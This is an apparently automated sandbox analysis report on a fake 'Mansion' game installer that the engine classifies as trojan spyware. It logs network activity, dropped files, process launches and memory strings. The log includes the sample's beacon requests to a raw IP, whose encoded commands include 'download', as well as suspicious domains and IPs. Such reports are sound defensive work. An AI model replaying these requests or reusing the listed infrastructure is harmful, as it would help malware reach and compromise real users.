Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46
Source: unknown	TCP traffic detected without corresponding DNS query: 95.216.224.46

Source: global traffic	HTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMDtATfnJO6JAXDQoHl8pAaJdhTQQU3QQJB6L1en1SUxKSle44gCUNplkCEG1SGHCH6CNNhWAA0ICPk1Y%3D HTTP/1.1Cache-Control: max-age = 86400Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 26 Sep 2024 16:44:07 GMTIf-None-Match: "59820a5ba49dee3594b50ae906ccedc5b81eb911"User-Agent: Microsoft-CryptoAPI/10.0Host: ocsps.ssl.com
Source: global traffic	HTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQg3SSkKA74hABkhmlBtJTz8w3hlAQU%2BWC71OPVNPa49QaAJadz20ZpqJ4CEEJLalPOx2YUHCpjsaUcQQQ%3D HTTP/1.1Cache-Control: max-age = 86400Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 26 Sep 2024 16:44:14 GMTIf-None-Match: "3d5557f4d0ce85b5d42ae97579b154c53648c418"User-Agent: Microsoft-CryptoAPI/10.0Host: ocsps.ssl.com
Source: global traffic	HTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=c3RhcnQ%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: /accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=bGV0c2dv&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: /accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=ZG93bmxvYWQ%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: /accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=Z2V0ZXhpdA%3D%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: /accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /ud83c7gi0/8pe93ha5y.php?get=Z2V0ZXhpdA%3D%3D&name=8J%2BqliBNYW5zaW9uIGdhbWU%3D&info=V2luZG93cyAxMCwgNDcyODQ3LCAxMjgweDEwMjQ%3D HTTP/1.1host: 95.216.224.46connection: keep-aliveaccept: /accept-language: *sec-fetch-mode: corsuser-agent: undiciaccept-encoding: gzip, deflate

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: ocsps.ssl.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: smartsjolutions.cyou
Source: global traffic	DNS traffic detected: DNS query: importenptoc.com
Source: global traffic	DNS traffic detected: DNS query: voicesharped.com
Source: global traffic	DNS traffic detected: DNS query: inputrreparnt.com
Source: global traffic	DNS traffic detected: DNS query: torpdidebar.com
Source: global traffic	DNS traffic detected: DNS query: rebeldettern.com
Source: global traffic	DNS traffic detected: DNS query: actiothreaz.com
Source: global traffic	DNS traffic detected: DNS query: garulouscuto.com
Source: global traffic	DNS traffic detected: DNS query: breedertremnd.com
Source: global traffic	DNS traffic detected: DNS query: ntp1.net.berkeley.edu
Source: global traffic	DNS traffic detected: DNS query: ts1.aco.net
Source: global traffic	DNS traffic detected: DNS query: x.ns.gin.ntt.net
Source: global traffic	DNS traffic detected: DNS query: ntp.time.in.ua
Source: global traffic	DNS traffic detected: DNS query: time-a-g.nist.gov
Source: global traffic	DNS traffic detected: DNS query: ntp.nict.jp

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Mansion_setup (1).exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000D.00000000.1565046627.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1565016510.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1564035206.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000D.00000000.1565835129.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: e67ccac6-1b55-47d3-986b-064f1ebcae9d.tmp.14.dr	String found in binary or memory: https://chrome.cloudflare-dns.com
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: en-GB.pak.5.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=en-GB&category=theme81https://myactivity.google.com/myactivity
Source: en-GB.pak.5.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=en-GBShortcut
Source: tr.pak.5.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=tr&category=theme81https://myactivity.google.com/myactivity/?u
Source: tr.pak.5.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=trK
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://myactivity.google.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://passwords.google.comGoogle
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://policies.google.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: tr.pak.5.dr	String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: en-GB.pak.5.dr, tr.pak.5.dr	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000D.00000000.1565835129.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000D.00000000.1568820754.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: tr.pak.5.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlKurulu
Source: en-GB.pak.5.dr	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlManaged
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000D.00000000.1547614933.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49425
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49424
Source: unknown	Network traffic detected: HTTP traffic on port 49435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49429 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49441 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49425 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49444
Source: unknown	Network traffic detected: HTTP traffic on port 49437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49442
Source: unknown	Network traffic detected: HTTP traffic on port 49433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49441
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49440
Source: unknown	Network traffic detected: HTTP traffic on port 49427 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49443 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49439
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49438
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49437
Source: unknown	Network traffic detected: HTTP traffic on port 49434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49436
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49435
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49434
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49433
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49432
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49431
Source: unknown	Network traffic detected: HTTP traffic on port 49430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49430
Source: unknown	Network traffic detected: HTTP traffic on port 49440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49429
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49427
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49426

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49425 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49427 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49429 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49432 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49433 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49434 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49436 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.91.193.85:443 -> 192.168.2.7:49444 version: TLS 1.2

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File dump: Mansion.exe.5.dr 163326464			Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File dump: Mansion.exe0.5.dr 163326464			Jump to dropped file

Abnormal high CPU Usage

Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe

Process Stats: CPU usage > 49%

Enables security privileges

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

Process token adjusted: Security

Jump to behavior

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344

PE file contains more sections than normal

Source: libEGL.dll0.5.dr	Static PE information: Number of sections : 11 > 10
Source: libEGL.dll.5.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll0.5.dr	Static PE information: Number of sections : 11 > 10
Source: Mansion.exe.5.dr	Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.5.dr	Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll0.5.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.5.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.5.dr	Static PE information: Number of sections : 11 > 10
Source: Mansion.exe0.5.dr	Static PE information: Number of sections : 15 > 10
Source: vulkan-1.dll.5.dr	Static PE information: Number of sections : 11 > 10

Uses 32bit PE files

Source: Mansion_setup (1).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: qtZint.exe.9.dr

Static PE information: Section: .qtmimed ZLIB complexity 0.998278287914692

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@52/278@22/11

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe

File created: C:\Users\user\AppData\Roaming\my-electron-app

Jump to behavior

Source: C:\games\DDR5_NetCache\qtZint.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:64:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-f33e4931-9ab6-355492-e6e220284809}

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

File created: C:\Users\user~1\AppData\Local\Temp\nsb7247.tmp

Jump to behavior

Source: Mansion_setup (1).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

File read: C:\Users\user\Desktop\Mansion_setup (1).exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Mansion_setup (1).exe "C:\Users\user\Desktop\Mansion_setup (1).exe"
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
